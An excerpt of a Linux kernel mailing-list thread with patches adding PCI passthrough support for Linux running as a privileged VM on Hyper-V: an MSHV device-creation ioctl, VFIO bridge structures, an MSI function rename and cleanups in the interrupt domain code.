static int hv_pcie_domain_alloc(struct irq_domain *d, unsigned int virq, unsigne void *arg) { /* - * TODO: Allocating and populating struct tran_int_desc in hv_compose_msi_msg() - * should be moved here. + * TODO: Allocating and populating struct tran_int_desc in + * hv_vmbus_compose_msi_msg() should be moved here. */ int ret; @@ -2227,7 +2228,7 @@ static int hv_pcie_init_irq_domain(struct hv_pcibus_device *hbus) /** * get_bar_size() - Get the address space consumed by a BAR * @bar_val: Value that a BAR returned after -1 was written - * to it. + * to it. * * This function returns the size of the BAR, rounded up to 1 * page. It has to be rounded up because the hypervisor's page @@ -2573,7 +2574,7 @@ static void q_resource_requirements(void *context, struct pci_response *resp, * new_pcichild_device() - Create a new child device * @hbus: The internal struct tracking this root PCI bus. * @desc: The information supplied so far from the host - * about the device. + * about the device. * * This function creates the tracking structure for a new child * device and kicks off the process of figuring out what it is. @@ -3100,7 +3101,7 @@ static void hv_pci_onchannelcallback(void *context) * sure that the packet pointer is still valid during the call: * here 'valid' means that there's a task still waiting for the * completion, and that the packet data is still on the waiting - * task's stack. Cf. hv_compose_msi_msg(). + * task's stack. Cf. hv_vmbus_compose_msi_msg(). */ comp_packet->completion_func(comp_packet->compl_ctxt, response, @@ -3417,7 +3418,7 @@ static int hv_allocate_config_window(struct hv_pcibus_device *hbus) * vmbus_allocate_mmio() gets used for allocating both device endpoint * resource claims (those which cannot be overlapped) and the ranges * which are valid for the children of this bus, which are intended - * to be overlapped by those children. Set the flag on this claim + * to be overlapped by those children. Set the flag on this claim * meaning that this region can't be overlapped. */ @@ -4066,7 +4067,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) irq_data = irq_get_irq_data(entry->irq); if (WARN_ON_ONCE(!irq_data)) return -EINVAL; - hv_compose_msi_msg(irq_data, &entry->msg); + hv_vmbus_compose_msi_msg(irq_data, &entry->msg); } return 0; } @@ -4074,7 +4075,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) /* * Upon resume, pci_restore_msi_state() -> ... -> __pci_write_msi_msg() * directly writes the MSI/MSI-X registers via MMIO, but since Hyper-V - * doesn't trap and emulate the MMIO accesses, here hv_compose_msi_msg() + * doesn't trap and emulate the MMIO accesses, here hv_vmbus_compose_msi_msg() * must be used to ask Hyper-V to re-create the IOMMU Interrupt Remapping * Table entries. */ -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:23 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add ioctl support for creating MSHV devices for a paritition. At present only VFIO device types are supported, but more could be added. At a high level, a partition ioctl to create device verifies it is of type VFIO and does some setup for bridge code in mshv_vfio.c. Adapted from KVM device ioctls. Credits: Original author: Wei Liu <wei.liu@kernel.org> NB: Slightly modified from the original version. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 126 ++++++++++++++++++++++++++++++++++++ 1 file changed, 126 insertions(+) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 83c7bad269a0..27313419828d 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1551,6 +1551,129 @@ mshv_partition_ioctl_initialize(struct mshv_partition *partition) return ret; } +static long mshv_device_attr_ioctl(struct mshv_device *mshv_dev, int cmd, + ulong uarg) +{ + struct mshv_device_attr attr; + const struct mshv_device_ops *devops = mshv_dev->device_ops; + + if (copy_from_user(&attr, (void __user *)uarg, sizeof(attr))) + return -EFAULT; + + switch (cmd) { + case MSHV_SET_DEVICE_ATTR: + if (devops->device_set_attr) + return devops->device_set_attr(mshv_dev, &attr); + break; + case MSHV_HAS_DEVICE_ATTR: + if (devops->device_has_attr) + return devops->device_has_attr(mshv_dev, &attr); + break; + } + + return -EPERM; +} + +static long mshv_device_fop_ioctl(struct file *filp, unsigned int cmd, + ulong uarg) +{ + struct mshv_device *mshv_dev = filp->private_data; + + switch (cmd) { + case MSHV_SET_DEVICE_ATTR: + case MSHV_HAS_DEVICE_ATTR: + return mshv_device_attr_ioctl(mshv_dev, cmd, uarg); + } + + return -ENOTTY; +} + +static int mshv_device_fop_release(struct inode *inode, struct file *filp) +{ + struct mshv_device *mshv_dev = filp->private_data; + struct mshv_partition *partition = mshv_dev->device_pt; + + if (mshv_dev->device_ops->device_release) { + mutex_lock(&partition->pt_mutex); + hlist_del(&mshv_dev->device_ptnode); + mshv_dev->device_ops->device_release(mshv_dev); + mutex_unlock(&partition->pt_mutex); + } + + mshv_partition_put(partition); + return 0; +} + +static const struct file_operations mshv_device_fops = { + .owner = THIS_MODULE, + .unlocked_ioctl = mshv_device_fop_ioctl, + .release = mshv_device_fop_release, +}; + +long mshv_partition_ioctl_create_device(struct mshv_partition *partition, + void __user *uarg) +{ + long rc; + struct mshv_create_device devargk; + struct mshv_device *mshv_dev; + const struct mshv_device_ops *vfio_ops; + int type; + + if (copy_from_user(&devargk, uarg, sizeof(devargk))) { + rc = -EFAULT; + goto out; + } + + /* At present, only VFIO is supported */ + if (devargk.type != MSHV_DEV_TYPE_VFIO) { + rc = -ENODEV; + goto out; + } + + if (devargk.flags & MSHV_CREATE_DEVICE_TEST) { + rc = 0; + goto out; + } + + mshv_dev = kzalloc(sizeof(*mshv_dev), GFP_KERNEL_ACCOUNT); + if (mshv_dev == NULL) { + rc = -ENOMEM; + goto out; + } + + vfio_ops = &mshv_vfio_device_ops; + mshv_dev->device_ops = vfio_ops; + mshv_dev->device_pt = partition; + + rc = vfio_ops->device_create(mshv_dev, type); + if (rc < 0) { + kfree(mshv_dev); + goto out; + } + + hlist_add_head(&mshv_dev->device_ptnode, &partition->pt_devices); + + mshv_partition_get(partition); + rc = anon_inode_getfd(vfio_ops->device_name, &mshv_device_fops, + mshv_dev, O_RDWR | O_CLOEXEC); + if (rc < 0) { + mshv_partition_put(partition); + hlist_del(&mshv_dev->device_ptnode); + vfio_ops->device_release(mshv_dev); + goto out; + } + + devargk.fd = rc; + rc = 0; + + if (copy_to_user(uarg, &devargk, sizeof(devargk))) { + rc = -EFAULT; + goto out; + } +out: + return rc; +} + static long mshv_partition_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg) { @@ -1587,6 +1710,9 @@ mshv_partition_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg) case MSHV_ROOT_HVCALL: ret = mshv_ioctl_passthru_hvcall(partition, true, uarg); break; + case MSHV_CREATE_DEVICE: + ret = mshv_partition_ioctl_create_device(partition, uarg); + break; default: ret = -ENOTTY; } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:22 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add data structs needed by the subsequent patch that introduces a new module to implement VFIO-MSHV pseudo device. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root.h | 23 +++++++++++++++++++++++ include/uapi/linux/mshv.h | 31 +++++++++++++++++++++++++++++++ 2 files changed, 54 insertions(+) diff --git a/drivers/hv/mshv_root.h b/drivers/hv/mshv_root.h index c3753b009fd8..42e1da1d545b 100644 --- a/drivers/hv/mshv_root.h +++ b/drivers/hv/mshv_root.h @@ -220,6 +220,29 @@ struct port_table_info { }; }; +struct mshv_device { + const struct mshv_device_ops *device_ops; + struct mshv_partition *device_pt; + void *device_private; + struct hlist_node device_ptnode; +}; + +struct mshv_device_ops { + const char *device_name; + long (*device_create)(struct mshv_device *dev, u32 type); + void (*device_release)(struct mshv_device *dev); + long (*device_set_attr)(struct mshv_device *dev, + struct mshv_device_attr *attr); + long (*device_has_attr)(struct mshv_device *dev, + struct mshv_device_attr *attr); +}; + +extern struct mshv_device_ops mshv_vfio_device_ops; +int mshv_vfio_ops_init(void); +void mshv_vfio_ops_exit(void); +long mshv_partition_ioctl_create_device(struct mshv_partition *partition, + void __user *user_args); + int mshv_update_routing_table(struct mshv_partition *partition, const struct mshv_user_irq_entry *entries, unsigned int numents); diff --git a/include/uapi/linux/mshv.h b/include/uapi/linux/mshv.h index dee3ece28ce5..b7b10f9e2896 100644 --- a/include/uapi/linux/mshv.h +++ b/include/uapi/linux/mshv.h @@ -252,6 +252,7 @@ struct mshv_root_hvcall { #define MSHV_GET_GPAP_ACCESS_BITMAP _IOWR(MSHV_IOCTL, 0x06, struct mshv_gpap_access_bitmap) /* Generic hypercall */ #define MSHV_ROOT_HVCALL _IOWR(MSHV_IOCTL, 0x07, struct mshv_root_hvcall) +#define MSHV_CREATE_DEVICE _IOWR(MSHV_IOCTL, 0x08, struct mshv_create_device) /* ******************************** @@ -402,4 +403,34 @@ struct mshv_sint_mask { /* hv_hvcall device */ #define MSHV_HVCALL_SETUP _IOW(MSHV_IOCTL, 0x1E, struct mshv_vtl_hvcall_setup) #define MSHV_HVCALL _IOWR(MSHV_IOCTL, 0x1F, struct mshv_vtl_hvcall) + +/* device passhthru */ +#define MSHV_CREATE_DEVICE_TEST 1 + +enum { + MSHV_DEV_TYPE_VFIO, + MSHV_DEV_TYPE_MAX, +}; + +struct mshv_create_device { + __u32 type; /* in: MSHV_DEV_TYPE_xxx */ + __u32 fd; /* out: device handle */ + __u32 flags; /* in: MSHV_CREATE_DEVICE_xxx */ +}; + +#define MSHV_DEV_VFIO_FILE 1 +#define MSHV_DEV_VFIO_FILE_ADD 1 +#define MSHV_DEV_VFIO_FILE_DEL 2 + +struct mshv_device_attr { + __u32 flags; /* no flags currently defined */ + __u32 group; /* device-defined */ + __u64 attr; /* group-defined */ + __u64 addr; /* userspace address of attr data */ +}; + +/* Device fds created with MSHV_CREATE_DEVICE */ +#define MSHV_SET_DEVICE_ATTR _IOW(MSHV_IOCTL, 0x00, struct mshv_device_attr) +#define MSHV_HAS_DEVICE_ATTR _IOW(MSHV_IOCTL, 0x01, struct mshv_device_attr) + #endif -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:20 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Make cosmetic changes: o Rename struct pci_dev *dev to *pdev since there are cases of struct device *dev in the file and all over the kernel o Rename hv_build_pci_dev_id to hv_build_devid_type_pci in anticipation of building different types of device ids o Fix checkpatch.pl issues with return and extraneous printk o Replace spaces with tabs o Rename struct hv_devid *xxx to struct hv_devid *hv_devid given code paths involve many types of device ids o Fix indentation in a large if block by using goto. There are no functional changes. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 197 +++++++++++++++++++----------------- 1 file changed, 103 insertions(+), 94 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index c3ba12b1bc07..f6b61483b3b8 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -1,5 +1,4 @@ // SPDX-License-Identifier: GPL-2.0 - /* * Irqdomain for Linux to run as the root partition on Microsoft Hypervisor. * @@ -14,8 +13,8 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> -static int hv_map_interrupt(union hv_device_id device_id, bool level, - int cpu, int vector, struct hv_interrupt_entry *entry) +static int hv_map_interrupt(union hv_device_id hv_devid, bool level, + int cpu, int vector, struct hv_interrupt_entry *ret_entry) { struct hv_input_map_device_interrupt *input; struct hv_output_map_device_interrupt *output; @@ -32,7 +31,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, intr_desc = &input->interrupt_descriptor; memset(input, 0, sizeof(*input)); input->partition_id = hv_current_partition_id; - input->device_id = device_id.as_uint64; + input->device_id = hv_devid.as_uint64; intr_desc->interrupt_type = HV_X64_INTERRUPT_TYPE_FIXED; intr_desc->vector_count = 1; intr_desc->target.vector = vector; @@ -44,7 +43,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, intr_desc->target.vp_set.valid_bank_mask = 0; intr_desc->target.vp_set.format = HV_GENERIC_SET_SPARSE_4K; - nr_bank = cpumask_to_vpset(&(intr_desc->target.vp_set), cpumask_of(cpu)); + nr_bank = cpumask_to_vpset(&intr_desc->target.vp_set, cpumask_of(cpu)); if (nr_bank < 0) { local_irq_restore(flags); pr_err("%s: unable to generate VP set\n", __func__); @@ -61,7 +60,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, status = hv_do_rep_hypercall(HVCALL_MAP_DEVICE_INTERRUPT, 0, var_size, input, output); - *entry = output->interrupt_entry; + *ret_entry = output->interrupt_entry; local_irq_restore(flags); @@ -71,21 +70,19 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, return hv_result_to_errno(status); } -static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *old_entry) +static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) { unsigned long flags; struct hv_input_unmap_device_interrupt *input; - struct hv_interrupt_entry *intr_entry; u64 status; local_irq_save(flags); input = *this_cpu_ptr(hyperv_pcpu_input_arg); memset(input, 0, sizeof(*input)); - intr_entry = &input->interrupt_entry; input->partition_id = hv_current_partition_id; input->device_id = id; - *intr_entry = *old_entry; + input->interrupt_entry = *irq_entry; status = hv_do_hypercall(HVCALL_UNMAP_DEVICE_INTERRUPT, input, NULL); local_irq_restore(flags); @@ -115,67 +112,71 @@ static int get_rid_cb(struct pci_dev *pdev, u16 alias, void *data) return 0; } -static union hv_device_id hv_build_pci_dev_id(struct pci_dev *dev) +static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) { - union hv_device_id dev_id; + int pos; + union hv_device_id hv_devid; struct rid_data data = { .bridge = NULL, - .rid = PCI_DEVID(dev->bus->number, dev->devfn) + .rid = PCI_DEVID(pdev->bus->number, pdev->devfn) }; - pci_for_each_dma_alias(dev, get_rid_cb, &data); + pci_for_each_dma_alias(pdev, get_rid_cb, &data); - dev_id.as_uint64 = 0; - dev_id.device_type = HV_DEVICE_TYPE_PCI; - dev_id.pci.segment = pci_domain_nr(dev->bus); + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_PCI; + hv_devid.pci.segment = pci_domain_nr(pdev->bus); - dev_id.pci.bdf.bus = PCI_BUS_NUM(data.rid); - dev_id.pci.bdf.device = PCI_SLOT(data.rid); - dev_id.pci.bdf.function = PCI_FUNC(data.rid); - dev_id.pci.source_shadow = HV_SOURCE_SHADOW_NONE; + hv_devid.pci.bdf.bus = PCI_BUS_NUM(data.rid); + hv_devid.pci.bdf.device = PCI_SLOT(data.rid); + hv_devid.pci.bdf.function = PCI_FUNC(data.rid); + hv_devid.pci.source_shadow = HV_SOURCE_SHADOW_NONE; - if (data.bridge) { - int pos; + if (data.bridge == NULL) + goto out; - /* - * Microsoft Hypervisor requires a bus range when the bridge is - * running in PCI-X mode. - * - * To distinguish conventional vs PCI-X bridge, we can check - * the bridge's PCI-X Secondary Status Register, Secondary Bus - * Mode and Frequency bits. See PCI Express to PCI/PCI-X Bridge - * Specification Revision 1.0 5.2.2.1.3. - * - * Value zero means it is in conventional mode, otherwise it is - * in PCI-X mode. - */ + /* + * Microsoft Hypervisor requires a bus range when the bridge is + * running in PCI-X mode. + * + * To distinguish conventional vs PCI-X bridge, we can check + * the bridge's PCI-X Secondary Status Register, Secondary Bus + * Mode and Frequency bits. See PCI Express to PCI/PCI-X Bridge + * Specification Revision 1.0 5.2.2.1.3. + * + * Value zero means it is in conventional mode, otherwise it is + * in PCI-X mode. + */ - pos = pci_find_capability(data.bridge, PCI_CAP_ID_PCIX); - if (pos) { - u16 status; + pos = pci_find_capability(data.bridge, PCI_CAP_ID_PCIX); + if (pos) { + u16 status; - pci_read_config_word(data.bridge, pos + - PCI_X_BRIDGE_SSTATUS, &status); + pci_read_config_word(data.bridge, pos + PCI_X_BRIDGE_SSTATUS, + &status); - if (status & PCI_X_SSTATUS_FREQ) { - /* Non-zero, PCI-X mode */ - u8 sec_bus, sub_bus; + if (status & PCI_X_SSTATUS_FREQ) { + /* Non-zero, PCI-X mode */ + u8 sec_bus, sub_bus; - dev_id.pci.source_shadow = HV_SOURCE_SHADOW_BRIDGE_BUS_RANGE; + hv_devid.pci.source_shadow = + HV_SOURCE_SHADOW_BRIDGE_BUS_RANGE; - pci_read_config_byte(data.bridge, PCI_SECONDARY_BUS, &sec_bus); - dev_id.pci.shadow_bus_range.secondary_bus = sec_bus; - pci_read_config_byte(data.bridge, PCI_SUBORDINATE_BUS, &sub_bus); - dev_id.pci.shadow_bus_range.subordinate_bus = sub_bus; - } + pci_read_config_byte(data.bridge, PCI_SECONDARY_BUS, + &sec_bus); + hv_devid.pci.shadow_bus_range.secondary_bus = sec_bus; + pci_read_config_byte(data.bridge, PCI_SUBORDINATE_BUS, + &sub_bus); + hv_devid.pci.shadow_bus_range.subordinate_bus = sub_bus; } } - return dev_id; +out: + return hv_devid; } -/** - * hv_map_msi_interrupt() - "Map" the MSI IRQ in the hypervisor. +/* + * hv_map_msi_interrupt() - Map the MSI IRQ in the hypervisor. * @data: Describes the IRQ * @out_entry: Hypervisor (MSI) interrupt entry (can be NULL) * @@ -188,22 +189,23 @@ int hv_map_msi_interrupt(struct irq_data *data, { struct irq_cfg *cfg = irqd_cfg(data); struct hv_interrupt_entry dummy; - union hv_device_id device_id; + union hv_device_id hv_devid; struct msi_desc *msidesc; - struct pci_dev *dev; + struct pci_dev *pdev; int cpu; msidesc = irq_data_get_msi_desc(data); - dev = msi_desc_to_pci_dev(msidesc); - device_id = hv_build_pci_dev_id(dev); + pdev = msi_desc_to_pci_dev(msidesc); + hv_devid = hv_build_devid_type_pci(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return hv_map_interrupt(device_id, false, cpu, cfg->vector, + return hv_map_interrupt(hv_devid, false, cpu, cfg->vector, out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); -static inline void entry_to_msi_msg(struct hv_interrupt_entry *entry, struct msi_msg *msg) +static void entry_to_msi_msg(struct hv_interrupt_entry *entry, + struct msi_msg *msg) { /* High address is always 0 */ msg->address_hi = 0; @@ -211,17 +213,19 @@ static inline void entry_to_msi_msg(struct hv_interrupt_entry *entry, struct msi msg->data = entry->msi_entry.data.as_uint32; } -static int hv_unmap_msi_interrupt(struct pci_dev *dev, struct hv_interrupt_entry *old_entry); +static int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry); + static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_interrupt_entry *stored_entry; struct irq_cfg *cfg = irqd_cfg(data); struct msi_desc *msidesc; - struct pci_dev *dev; + struct pci_dev *pdev; int ret; msidesc = irq_data_get_msi_desc(data); - dev = msi_desc_to_pci_dev(msidesc); + pdev = msi_desc_to_pci_dev(msidesc); if (!cfg) { pr_debug("%s: cfg is NULL", __func__); @@ -240,7 +244,7 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) stored_entry = data->chip_data; data->chip_data = NULL; - ret = hv_unmap_msi_interrupt(dev, stored_entry); + ret = hv_unmap_msi_interrupt(pdev, stored_entry); kfree(stored_entry); @@ -249,10 +253,8 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) } stored_entry = kzalloc(sizeof(*stored_entry), GFP_ATOMIC); - if (!stored_entry) { - pr_debug("%s: failed to allocate chip data\n", __func__); + if (!stored_entry) return; - } ret = hv_map_msi_interrupt(data, stored_entry); if (ret) { @@ -262,18 +264,21 @@ static void hv_irq_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) data->chip_data = stored_entry; entry_to_msi_msg(data->chip_data, msg); - - return; } -static int hv_unmap_msi_interrupt(struct pci_dev *dev, struct hv_interrupt_entry *old_entry) +static int hv_unmap_msi_interrupt(struct pci_dev *pdev, + struct hv_interrupt_entry *irq_entry) { - return hv_unmap_interrupt(hv_build_pci_dev_id(dev).as_uint64, old_entry); + union hv_device_id hv_devid; + + hv_devid = hv_build_devid_type_pci(pdev); + return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); } -static void hv_teardown_msi_irq(struct pci_dev *dev, struct irq_data *irqd) +/* NB: during map, hv_interrupt_entry is saved via data->chip_data */ +static void hv_teardown_msi_irq(struct pci_dev *pdev, struct irq_data *irqd) { - struct hv_interrupt_entry old_entry; + struct hv_interrupt_entry irq_entry; struct msi_msg msg; if (!irqd->chip_data) { @@ -281,13 +286,13 @@ static void hv_teardown_msi_irq(struct pci_dev *dev, struct irq_data *irqd) return; } - old_entry = *(struct hv_interrupt_entry *)irqd->chip_data; - entry_to_msi_msg(&old_entry, &msg); + irq_entry = *(struct hv_interrupt_entry *)irqd->chip_data; + entry_to_msi_msg(&irq_entry, &msg); kfree(irqd->chip_data); irqd->chip_data = NULL; - (void)hv_unmap_msi_interrupt(dev, &old_entry); + (void)hv_unmap_msi_interrupt(pdev, &irq_entry); } /* @@ -302,7 +307,8 @@ static struct irq_chip hv_pci_msi_controller = { }; static bool 